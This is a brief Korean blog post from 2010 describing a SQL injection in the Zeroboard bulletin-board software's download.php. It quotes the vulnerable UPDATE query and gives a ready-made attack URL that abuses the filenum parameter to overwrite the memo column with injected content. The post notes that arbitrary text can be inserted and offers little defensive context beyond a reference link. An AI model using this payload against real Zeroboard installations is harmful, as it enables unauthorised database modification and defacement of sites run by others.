'Mass SQL Injection'에 해당되는 글 1건

  1. 2010.01.26 Zeroboard에서 발생한 Mass Sql Injection
참고: http://www.securityplus.or.kr/xe/?document_srl=17273&vid=bangrip1

취약쿼리실행

update zetyx_board_id set downloadXXX=downloadXXX+1 where no='6'

공격문
download.php?id=id&filenum=1=download1,memo= concat(char(67),char(79),char(68),char(69))%23&no=6

1=download1 의 경우 임의의 문자삽입 가능
예)
2=111



'vulnerability' 카테고리의 다른 글

LNK 파일 생성기(Windows LNK Vulnerability)  (1) 2010.07.27
html file upload form  (0) 2010.06.24
Java Deployment Toolkit Test Page  (0) 2010.04.19
XE 1.4.0.10 XSS/CSRF 취약점  (0) 2010.04.16
FCK Editor  (0) 2010.04.11
Posted by applicationlayer
: